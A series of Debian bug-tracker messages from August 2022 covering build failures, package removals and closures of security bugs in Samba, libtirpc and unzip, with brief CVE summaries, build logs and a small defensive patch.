Control: tag -1 pending patch Hi, I have submitted a MR: https://salsa.debian.org/debian/faketime/-/merge_requests/2 I'll upload that fix shortly to DELAYED/2. Please let me know if I should cancel or delay longer. Paul OpenPGP_signature Description: OpenPGP digital signature
Processed: update bts meta info
Processing commands for cont...@bugs.debian.org: > reassign 1016453 src:python-bonsai 1.3.0+ds-3 Bug #1016453 {Done: Robin Jarry } [src:python-tornado, src:python-bonsai] python-tornado breaks python-bonsai autopkgtest: 'TornadoLDAPConnectionTest' object has no attribute 'should_close_asyncio_loop' Bug reassigned from package 'src:python-tornado, src:python-bonsai' to 'src:python-bonsai'. No longer marked as found in versions python-tornado/6.2.0-1 and python-bonsai/1.3.0+ds-3. No longer marked as fixed in versions python-bonsai/1.3.0+ds-4. Bug #1016453 {Done: Robin Jarry } [src:python-bonsai] python-tornado breaks python-bonsai autopkgtest: 'TornadoLDAPConnectionTest' object has no attribute 'should_close_asyncio_loop' Marked as found in versions python-bonsai/1.3.0+ds-3. > affects 1016453 src:python-tornado Bug #1016453 {Done: Robin Jarry } [src:python-bonsai] python-tornado breaks python-bonsai autopkgtest: 'TornadoLDAPConnectionTest' object has no attribute 'should_close_asyncio_loop' Added indication that 1016453 affects src:python-tornado > fixed 1016453 1.3.0+ds-4 Bug #1016453 {Done: Robin Jarry } [src:python-bonsai] python-tornado breaks python-bonsai autopkgtest: 'TornadoLDAPConnectionTest' object has no attribute 'should_close_asyncio_loop' Marked as fixed in versions python-bonsai/1.3.0+ds-4. > thanks Stopping processing here. Please contact me if you need assistance. -- 1016453: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016453 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1011783: marked as done (pandoc: FTBFS: make: *** [/usr/share/cdbs/1/class/hlibrary.mk:153: build-ghc-stamp] Error 25)
Your message dated Sat, 13 Aug 2022 20:27:59 +0200 with message-id <166041527912.5261.6325723291520590...@auryn.jones.dk> and subject line Re: Bug#1011783: pandoc: FTBFS: make: *** [/usr/share/cdbs/1/class/hlibrary.mk:153: build-ghc-stamp] Error 25 has caused the Debian Bug report #1011783, regarding pandoc: FTBFS: make: *** [/usr/share/cdbs/1/class/hlibrary.mk:153: build-ghc-stamp] Error 25 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1011783: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1011783 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: pandoc Version: 2.9.2.1-3 Severity: serious Justification: FTBFS Tags: bookworm sid ftbfs User: lu...@debian.org Usertags: ftbfs-20220525 ftbfs-bookworm Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part (hopefully): > debian/rules binary > test -x debian/rules > dh_testroot > dh_prep > dh_installdirs -A > mkdir -p "." > CDBS WARNING:DEB_DH_STRIP_ARGS is deprecated since 0.4.85 > CDBS WARNING:DEB_COMPRESS_EXCLUDE is deprecated since 0.4.85 > Adding cdbs dependencies to debian/pandoc-data.substvars > dh_installdirs -ppandoc-data \ > > dh_haskell_description --package=pandoc-data > Running grep-dctrl --no-field-names --show-field=Description --field=Source > --regex .* debian/control > Running grep-dctrl --no-field-names --show-field=X-Description --field=Source > --regex .* debian/control > dh_haskell_compiler --package=pandoc-data > Running dpkg-query --showformat=${Version} --show ghc > 8.8.4-3 > Adding cdbs dependencies to debian/libghc-pandoc-doc.substvars > dh_installdirs -plibghc-pandoc-doc \ > > perl -d:Confess -MDebian::Debhelper::Buildsystem::Haskell::Recipes=/.*/ \ > -E 'make_setup_recipe' > Running ghc --make Setup.hs -o debian/hlibrary.setup > [1 of 1] Compiling Main ( Setup.hs, Setup.o ) > Linking debian/hlibrary.setup ... > perl -d:Confess -MDebian::Debhelper::Buildsystem::Haskell::Recipes=/.*/ \ > -E 'configure_recipe; haddock_recipe; build_recipe; check_recipe' > Running find . ! -newer /tmp/TDbdV9Zp_Y -exec touch -d "1998-01-01 UTC" {} ; > Running dh_listpackages > pandoc > pandoc-data > libghc-pandoc-dev > libghc-pandoc-doc > libghc-pandoc-prof > Running dh_listpackages > pandoc > pandoc-data > libghc-pandoc-dev > libghc-pandoc-doc > libghc-pandoc-prof > Running dpkg-buildflags --get LDFLAGS > -Wl,-z,relro > Running debian/hlibrary.setup configure --ghc -v2 > --package-db=/var/lib/ghc/package.conf.d --prefix=/usr > --libdir=/usr/lib/haskell-packages/ghc/lib --libexecdir=/usr/lib > --builddir=dist-ghc --ghc-option=-optl-Wl,-z,relro > --haddockdir=/usr/lib/ghc-doc/haddock/pandoc-2.9.2.1/ --datasubdir=pandoc > --htmldir=/usr/share/doc/libghc-pandoc-doc/html/ --enable-library-profiling > --flags=-threaded --ghc-options=+RTS -V0 -RTS -ftests > Using Parsec parser > Configuring pandoc-2.9.2.1... > Flags chosen: embed_data_files=False, static=False, trypandoc=False > Dependency Glob >=0.7 && <0.11: using Glob-0.10.1 > Dependency HTTP >=4000.0.5 && <4000.4: using HTTP-4000.3.14 > Dependency HsYAML ==0.2.*: using HsYAML-0.2.1.0 > Dependency JuicyPixels >=3.1.6.1 && <3.4: using JuicyPixels-3.3.5 > Dependency SHA ==1.6.*: using SHA-1.6.4.4 > Dependency aeson >=0.7 && <1.5: using aeson-1.4.7.1 > Dependency aeson-pretty >=0.8.5 && <0.9: using aeson-pretty-0.8.8 > Dependency attoparsec >=0.12 && <0.14: using attoparsec-0.13.2.4 > Dependency base >=4.9 && <5: using base-4.13.0.0 > Dependency base64-bytestring >=0.1 && <1.1: using base64-bytestring-1.0.0.3 > Dependency binary >=0.5 && <0.11: using binary-0.8.7.0 > Dependency blaze-html ==0.9.*: using blaze-html-0.9.1.2 > Dependency blaze-markup ==0.8.*: using blaze-markup-0.8.2.7 > Dependency bytestring >=0.9 && <0.11: using bytestring-0.10.10.1 > Dependency case-insensitive ==1.2.*: using case-insensitive-1.2.1.0 > Dependency cmark-gfm ==0.2.*: using cmark-gfm-0.2.1 > Dependency containers >=0.4.2.1 && <0.7: using containers-0.6.2.1 > Dependency data-default >=0.4 && <0.8: using data-default-0.7.1.1 > Dependency deepseq >=1.3 && <1.5: using deepseq-1.4.4.0 > Dependency directory >=1.2.3 && <1.4: using directory-1.3.6.0 > Dependency doclayout ==0.3.*: using doclayout-0.3 > Dependency doctemplates ==0.8.*: using doctemplates-0.8.2 > Dependency emojis ==0.1.*: using emojis-0.1 > Dependency exceptions >=0.8 && <0.11: using exceptions-0.10.4 > Dependency filepath >=1.1 && <1.5: using filepath-1.4.2.1 > Dependency haddock-library ==1.8.*: using haddock-library-1.8.0 >
Bug#1016449: marked as done (samba: CVE-2022-2031 CVE-2022-32742 CVE-2022-32744 CVE-2022-32745 CVE-2022-32746)
Your message dated Sat, 13 Aug 2022 18:17:43 + with message-id and subject line Bug#1016449: fixed in samba 2:4.13.13+dfsg-1~deb11u5 has caused the Debian Bug report #1016449, regarding samba: CVE-2022-2031 CVE-2022-32742 CVE-2022-32744 CVE-2022-32745 CVE-2022-32746 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1016449: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016449 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: samba Version: 2:4.16.3+dfsg-1 Severity: grave Tags: security upstream X-Debbugs-Cc: car...@debian.org, Debian Security Team Hi, The following vulnerabilities were published for samba. CVE-2022-2031[0]: | Samba AD users can bypass certain restrictions associated with | changing passwords CVE-2022-32742[1]: | Server memory information leak via SMB1 CVE-2022-32744[2]: | Samba AD users can forge password change requests for any user CVE-2022-32745[3]: | Samba AD users can crash the server process with an LDAP add or modify | request CVE-2022-32746[4]: | Samba AD users can induce a use-after-free in the server process | with an LDAP add or modify request If you fix the vulnerabilities please also make sure to include the CVE (Common Vulnerabilities & Exposures) ids in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2022-2031 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2031 [1] https://security-tracker.debian.org/tracker/CVE-2022-32742 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32742 [2] https://security-tracker.debian.org/tracker/CVE-2022-32744 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32744 [3] https://security-tracker.debian.org/tracker/CVE-2022-32745 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32745 [4] https://security-tracker.debian.org/tracker/CVE-2022-32746 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32746 Please adjust the affected versions in the BTS as needed. Regards, Salvatore --- End Message --- --- Begin Message --- Source: samba Source-Version: 2:4.13.13+dfsg-1~deb11u5 Done: Michael Tokarev We believe that the bug you reported is fixed in the latest version of samba, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1016...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Michael Tokarev (supplier of updated samba package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Wed, 10 Aug 2022 00:19:38 +0300 Source: samba Architecture: source Version: 2:4.13.13+dfsg-1~deb11u5 Distribution: bullseye-security Urgency: medium Maintainer: Debian Samba Maintainers Changed-By: Michael Tokarev Closes: 1016449 Changes: samba (2:4.13.13+dfsg-1~deb11u5) bullseye-security; urgency=medium . * 3 patches: - CVE-2022-32742-bug-15085-4.13.patch - kpasswd_bugs_v15_4-13.patch - ldb-memory-bug-15096-4.13-v3.patch fixing: o CVE-2022-2031: Samba AD users can bypass certain restrictions associated with changing passwords. https://www.samba.org/samba/security/CVE-2022-2031.html o CVE-2022-32742: Server memory information leak via SMB1. https://www.samba.org/samba/security/CVE-2022-32742.html o CVE-2022-32744: Samba AD users can forge password change requests for any user. https://www.samba.org/samba/security/CVE-2022-32744.html o CVE-2022-32745: Samba AD users can crash the server process with an LDAP add or modify request. https://www.samba.org/samba/security/CVE-2022-32745.html o CVE-2022-32746: Samba AD users can induce a use-after-free in the server process with an LDAP add or modify request. https://www.samba.org/samba/security/CVE-2022-32746.html * Closes: #1016449, CVE-2022-2031 CVE-2022-32742, CVE-2022-32744, CVE-2022-32745, CVE-2022-32746 * Build-Depend on libldb-dev >= 2.2.3-2~deb11u2 (which includes the new symbols in libldb used by this update) * d/rules: use dpkg-query instead of pkg-config to find debian package version of libldb-dev, since this is what we actually want, not the
Bug#1015873: marked as done (libtirpc: CVE-2021-46828)
Your message dated Sat, 13 Aug 2022 18:17:38 + with message-id and subject line Bug#1015873: fixed in libtirpc 1.3.1-1+deb11u1 has caused the Debian Bug report #1015873, regarding libtirpc: CVE-2021-46828 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1015873: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1015873 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: libtirpc X-Debbugs-CC: t...@security.debian.org Severity: grave Tags: security Hi, The following vulnerability was published for libtirpc. CVE-2021-46828[0]: | In libtirpc before 1.3.3rc1, remote attackers could exhaust the file | descriptors of a process that uses libtirpc because idle TCP | connections are mishandled. This can, in turn, lead to an svc_run | infinite loop without accepting new connections. Patch: http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2021-46828 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828 Please adjust the affected versions in the BTS as needed. --- End Message --- --- Begin Message --- Source: libtirpc Source-Version: 1.3.1-1+deb11u1 Done: Salvatore Bonaccorso We believe that the bug you reported is fixed in the latest version of libtirpc, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1015...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Salvatore Bonaccorso (supplier of updated libtirpc package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 01 Aug 2022 16:26:18 +0200 Source: libtirpc Architecture: source Version: 1.3.1-1+deb11u1 Distribution: bullseye-security Urgency: high Maintainer: Josue Ortega Changed-By: Salvatore Bonaccorso Closes: 1015873 Changes: libtirpc (1.3.1-1+deb11u1) bullseye-security; urgency=high . * Non-maintainer upload by the Security Team. * Fix DoS vulnerability in libtirpc (CVE-2021-46828) (Closes: #1015873) Checksums-Sha1: ef4de51addd3ef95c3c11ba0c99d1f22df332cee 2273 libtirpc_1.3.1-1+deb11u1.dsc 882eaf4c13f0cafb83afd96cd2855638f978d755 513399 libtirpc_1.3.1.orig.tar.bz2 0d076df08b6d8832081985db4af14cdf9585de20 12752 libtirpc_1.3.1-1+deb11u1.debian.tar.xz Checksums-Sha256: f6c9103b9155e0845a991e08678c9faad8a087c502cf8c8c552046c27847 2273 libtirpc_1.3.1-1+deb11u1.dsc 245895caf066bec5e3d4375942c8cb4366adad184c29c618d97f724ea309ee17 513399 libtirpc_1.3.1.orig.tar.bz2 a0415b82adeba844372ca104e87376cd4c4bbb47e490925369e46e1c8f8750d4 12752 libtirpc_1.3.1-1+deb11u1.debian.tar.xz Files: 7bdd2f21ca4980839d63b765bab1cde0 2273 libs optional libtirpc_1.3.1-1+deb11u1.dsc f222e258c129c6da2f8f9cfe7f1ed745 513399 libs optional libtirpc_1.3.1.orig.tar.bz2 364e4589b0221806ebead567d4e9660b 12752 libs optional libtirpc_1.3.1-1+deb11u1.debian.tar.xz -BEGIN PGP SIGNATURE- iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmLoOiFfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk ZWJpYW4ub3JnAAoJEAVMuPMTQ89EKnsP/3ows43qqXwPGxGc+2vYdeeme9rcwZua No7NyCPL4fFMUuQTVxT2Z+230nXONe9v2/2tT5Mizn7hV3xrtKYzXUnqOO/U53va IlBvrEa6a2n9m8fzW6SbP+o352azjWd0/STXzrhr64zvwvfl6v3QOBoXRWeWuahH JtQhv2juxIvk1OnmgRJ7aSR0nyUYnAdWPmf2pv1rAyccRSSqSv/RjKJSeXZeD9CZ TXM2/4x2583l2YhHmwa3EH9Umqa9KLwcw2My6GQWnqas++hC2bhdG09gV7hLd8nG dKInHMH9I13UxiC/xS1MolaAfrc90oIX1pFMr1RfgpxkMMrQ2tKskRCLeVp7zINW cwMeG9cRngL3Elxpb4kXDSB59XmMWNece41lq2zWA1HkDSBkk5W0wy7tcLPTvgB7 D9WSSuOsE0ux/d/Dk4+paOf2AnYMjewAdeNsK4jkb/vaOaGMZTKQFIZkf+ICTZxv GUDgRe610OhA1WHgvTIm3V++2XRPLBrdY4XikqU6+yTRYNhbLzAW/ZCbA5fRdjmJ ftYJ9FcZPUPOmPAJUwYSmUlK0YyiLwMQ0RXVyPrXlAZXyi06Qat6fh73TfXzUK8R U+UjhSwXuSB6WWtzTPdAsFGmjoeSWgYQVeNHi96p4i4OBZTsCCXsIqywqRfb47Zp 4qwuUx/ambvU =ZOvy -END PGP SIGNATURE End Message ---
Bug#1010355: marked as done (unzip: CVE-2022-0529 CVE-2022-0530)
Your message dated Sat, 13 Aug 2022 18:18:12 + with message-id and subject line Bug#1010355: fixed in unzip 6.0-26+deb11u1 has caused the Debian Bug report #1010355, regarding unzip: CVE-2022-0529 CVE-2022-0530 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1010355: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: unzip Version: 6.0-21+deb9u2 Severity: serious Tags: security upstream patch X-Debbugs-Cc: Debian Security Team Fixed: 6.0-26 Hello, details are at https://security-tracker.debian.org/tracker/CVE-2022-0530 stretch and buster segfault: $ unzip testcase-0530 Archive: testcase-0530 warning [testcase-0530]: 16 extra bytes at beginning or within zipfile (attempting to process anyway) error [testcase-0530]: reported length of central directory is -16 bytes too long (Atari STZip zipfile? J.H.Holm ZIPSPLIT 1.1 zipfile?). Compensating... error: zipfile probably corrupt (segmentation violation) bullseye errors out without valgrind issues reported: $ unzip testcase-0530 Archive: testcase-0530 warning [testcase-0530]: 16 extra bytes at beginning or within zipfile (attempting to process anyway) error [testcase-0530]: reported length of central directory is -16 bytes too long (Atari STZip zipfile? J.H.Holm ZIPSPLIT 1.1 zipfile?). Compensating... mp/zip-unzip-0/7/source/workdir/��6a9f01ad36a4ac3b68815bf6f83b3ff_inpu㉴�瑥: mismatching "local" filename (mp/zip-unzip-0/7/source/workdir/��6a9f01ad36a4ac3b6881PK^G^HQ�V�^Q), continuing with "central" filename version skipping: mp/zip-unzip-0/7/source/workdir/��6a9f01ad36a4ac3b68815bf6f83b3ff_inpu㉴�瑥 unable to get password The main issue here seems to be at utf8_to_local_string, defined in process.c:2606, which doesn't check the result of utf8_to_wide_string for a NULL value. I'm attaching a proposed patch that adds the missing error handling. Enrico -- System Information: Debian Release: 11.3 APT prefers stable-security APT policy: (500, 'stable-security'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 5.10.0-13-amd64 (SMP w/4 CPU threads) Locale: LANG=en_IE.UTF-8, LC_CTYPE=en_IE.UTF-8 (charmap=UTF-8), LANGUAGE=en_IE:en Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages unzip depends on: ii libbz2-1.0 1.0.8-4 ii libc6 2.31-13+deb11u3 unzip recommends no packages. Versions of packages unzip suggests: ii zip 3.0-12 -- no debconf information diff --git a/fileio.c b/fileio.c index 6290824..77e4b5f 100644 --- a/fileio.c +++ b/fileio.c @@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */ /* convert UTF-8 to local character set */ fn = utf8_to_local_string(G.unipath_filename, G.unicode_escape_all); + if (fn == NULL) +return PK_ERR; + /* make sure filename is short enough */ if (strlen(fn) >= FILNAMSIZ) { fn[FILNAMSIZ - 1] = '\0'; diff --git a/process.c b/process.c index d2a846e..715bc0f 100644 --- a/process.c +++ b/process.c @@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all) int escape_all; { zwchar *wide = utf8_to_wide_string(utf8_string); + if (wide == NULL) +return NULL; char *loc = wide_to_local_string(wide, escape_all); free(wide); return loc; --- End Message --- --- Begin Message --- Source: unzip Source-Version: 6.0-26+deb11u1 Done: Santiago Vila We believe that the bug you reported is fixed in the latest version of unzip, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1010...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Santiago Vila (supplier of updated unzip package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Sun, 07 Aug 2022 01:45:00 +0200 Source: unzip Architecture: source Version: 6.0-26+deb11u1
Bug#1013493: marked as done (python-django-jsonfield: FTBFS: ImportError: cannot import name 'ugettext_lazy' from 'django.utils.translation' (/usr/lib/python3/dist-packages/django/utils/translation/__
Your message dated Sat, 13 Aug 2022 18:10:31 + with message-id and subject line Bug#1016370: Removed package(s) from unstable has caused the Debian Bug report #1013493, regarding python-django-jsonfield: FTBFS: ImportError: cannot import name 'ugettext_lazy' from 'django.utils.translation' (/usr/lib/python3/dist-packages/django/utils/translation/__init__.py) to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1013493: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013493 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: python-django-jsonfield Version: 1.4.0-3 Severity: serious Justification: FTBFS Tags: bookworm sid ftbfs User: lu...@debian.org Usertags: ftbfs-20220624 ftbfs-bookworm Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part (hopefully): > make[1]: Entering directory '/<>' > dh_auto_test -- --system=custom --test-args="{interpreter} > debian/run_tests.py" > I: pybuild base:239: python3.9 debian/run_tests.py > Traceback (most recent call last): > File "/<>/debian/run_tests.py", line 23, in > django.setup() > File "/usr/lib/python3/dist-packages/django/__init__.py", line 24, in setup > apps.populate(settings.INSTALLED_APPS) > File "/usr/lib/python3/dist-packages/django/apps/registry.py", line 91, in > populate > app_config = AppConfig.create(entry) > File "/usr/lib/python3/dist-packages/django/apps/config.py", line 228, in > create > import_module(entry) > File "/usr/lib/python3.9/importlib/__init__.py", line 127, in import_module > return _bootstrap._gcd_import(name[level:], package, level) > File "", line 1030, in _gcd_import > File "", line 1007, in _find_and_load > File "", line 986, in _find_and_load_unlocked > File "", line 680, in _load_unlocked > File "", line 850, in exec_module > File "", line 228, in _call_with_frames_removed > File "/<>/jsonfield/__init__.py", line 3, in > from .fields import JSONField > File "/<>/jsonfield/fields.py", line 9, in > from django.utils.translation import ugettext_lazy as _ > ImportError: cannot import name 'ugettext_lazy' from > 'django.utils.translation' > (/usr/lib/python3/dist-packages/django/utils/translation/__init__.py) > E: pybuild pybuild:369: test: plugin custom failed with: exit code=1: > python3.9 debian/run_tests.py > I: pybuild base:239: python3.10 debian/run_tests.py > Traceback (most recent call last): > File "/<>/debian/run_tests.py", line 23, in > django.setup() > File "/usr/lib/python3/dist-packages/django/__init__.py", line 24, in setup > apps.populate(settings.INSTALLED_APPS) > File "/usr/lib/python3/dist-packages/django/apps/registry.py", line 91, in > populate > app_config = AppConfig.create(entry) > File "/usr/lib/python3/dist-packages/django/apps/config.py", line 228, in > create > import_module(entry) > File "/usr/lib/python3.10/importlib/__init__.py", line 126, in import_module > return _bootstrap._gcd_import(name[level:], package, level) > File "", line 1050, in _gcd_import > File "", line 1027, in _find_and_load > File "", line 1006, in _find_and_load_unlocked > File "", line 688, in _load_unlocked > File "", line 883, in exec_module > File "", line 241, in _call_with_frames_removed > File "/<>/jsonfield/__init__.py", line 3, in > from .fields import JSONField > File "/<>/jsonfield/fields.py", line 9, in > from django.utils.translation import ugettext_lazy as _ > ImportError: cannot import name 'ugettext_lazy' from > 'django.utils.translation' > (/usr/lib/python3/dist-packages/django/utils/translation/__init__.py) > E: pybuild pybuild:369: test: plugin custom failed with: exit code=1: > python3.10 debian/run_tests.py > dh_auto_test: error: pybuild --test -i python{version} -p "3.9 3.10" > --system=custom "--test-args={interpreter} debian/run_tests.py" returned exit > code 13 The full build log is available from: http://qa-logs.debian.net/2022/06/24/python-django-jsonfield_1.4.0-3_unstable.log All bugs filed during this archive rebuild are listed at: https://bugs.debian.org/cgi-bin/pkgreport.cgi?tag=ftbfs-20220624;users=lu...@debian.org or: https://udd.debian.org/bugs/?release=na=ign=7=7=only=ftbfs-20220624=lu...@debian.org=1=1=1=1#results A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! If you reassign this bug to another package, please marking it as 'affects'-ing this package. See
Bug#967915: marked as done (Depends on geda-gaf)
Your message dated Sat, 13 Aug 2022 18:06:13 + with message-id and subject line Bug#1016665: Removed package(s) from unstable has caused the Debian Bug report #967915, regarding Depends on geda-gaf to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 967915: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=967915 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: gspiceui Severity: serious geda-gaf is scheduled for removal (#965098) and gspiceui depends on it. Quoting Bdale in the RM bug above: It looks like the last gspiceui upstream release was in late 2018, and the only reason it depends on geda-gaf is that it wants to use gnetlist to import schematic data from gschem. Updating that to use lepton-netlist to import schematic data from lepton-schematic should be a pretty simple search and replace operation if keeping gspiceui seems worthwhile (I don't know, I've never used it). Cheers, Moritz --- End Message --- --- Begin Message --- Version: 1.2.36+dfsg-1+rm Dear submitter, as the package gspiceui has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1016665 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#966736: marked as done (geda-gaf: Unversioned Python removal in sid/bullseye)
Your message dated Sat, 13 Aug 2022 18:07:25 + with message-id and subject line Bug#1008700: Removed package(s) from unstable has caused the Debian Bug report #966736, regarding geda-gaf: Unversioned Python removal in sid/bullseye to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 966736: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966736 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:geda-gaf Version: 1:1.8.2-11 Severity: serious Tags: sid bullseye User: debian-pyt...@lists.debian.org Usertags: py2unversioned Python2 becomes end-of-live upstream, and Debian aims to remove Python2 from the distribution, as discussed in https://lists.debian.org/debian-python/2019/07/msg00080.html We will keep some Python2 package as discussed in https://lists.debian.org/debian-python/2020/07/msg00039.html but removing the unversioned python packages python-minimal, python, python-dev, python-dbg, python-doc. Your package either build-depends, depends on one of those packages. Please either convert these packages to Python3, or if that is not possible, replaces the dependencies on the unversioned Python packages with one of the python2 dependencies (python2, python2-dev, python2-dbg, python2-doc). Please check for dependencies, build dependencies AND autopkg tests. If there are questions, please refer to the wiki page for the removal: https://wiki.debian.org/Python/2Removal, or ask for help on IRC #debian-python, or the debian-pyt...@lists.debian.org mailing list. --- End Message --- --- Begin Message --- Version: 1:1.8.2-11+rm Dear submitter, as the package geda-gaf has just been removed from the Debian archive unstable we hereby close the associated bug reports. We are sorry that we couldn't deal with your issue properly. For details on the removal, please see https://bugs.debian.org/1008700 The version of this package that was in Debian prior to this removal can still be found using http://snapshot.debian.org/. Please note that the changes have been done on the master archive and will not propagate to any mirrors until the next dinstall run at the earliest. This message was generated automatically; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org. Debian distribution maintenance software pp. Thorsten Alteholz (the ftpmaster behind the curtain)--- End Message ---
Bug#936593: marked as done (geda-gaf: Python2 removal in sid/bullseye)
Your message dated Sat, 13 Aug 2022 18:07:25 + with message-id and subject line Bug#1008700: Removed package(s) from unstable has caused the Debian Bug report #936593, regarding geda-gaf: Python2 removal in sid/bullseye to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 936593: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=936593 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Package: src:geda-gaf Version: 1:1.8.2-11 Severity: normal Tags: sid bullseye User: debian-pyt...@lists.debian.org Usertags: py2removal Python2 becomes end-of-live upstream, and Debian aims to remove Python2 from the distribution, as discussed in https://lists.debian.org/debian-python/2019/07/msg00080.html Your package either build-depends, depends on Python2, or uses Python2 in the autopkg tests. Please stop using Python2, and fix this issue by one of the following actions. - Convert your Package to Python3. This is the preferred option. In case you are providing a Python module foo, please consider dropping the python-foo package, and only build a python3-foo package. Please don't drop Python2 modules, which still have reverse dependencies, just document them. This is the preferred option. - If the package is dead upstream, cannot be converted or maintained in Debian, it should be removed from the distribution. If the package still has reverse dependencies, raise the severity to "serious" and document the reverse dependencies with the BTS affects command. If the package has no reverse dependencies, confirm that the package can be removed, reassign this issue to ftp.debian.org, make sure that 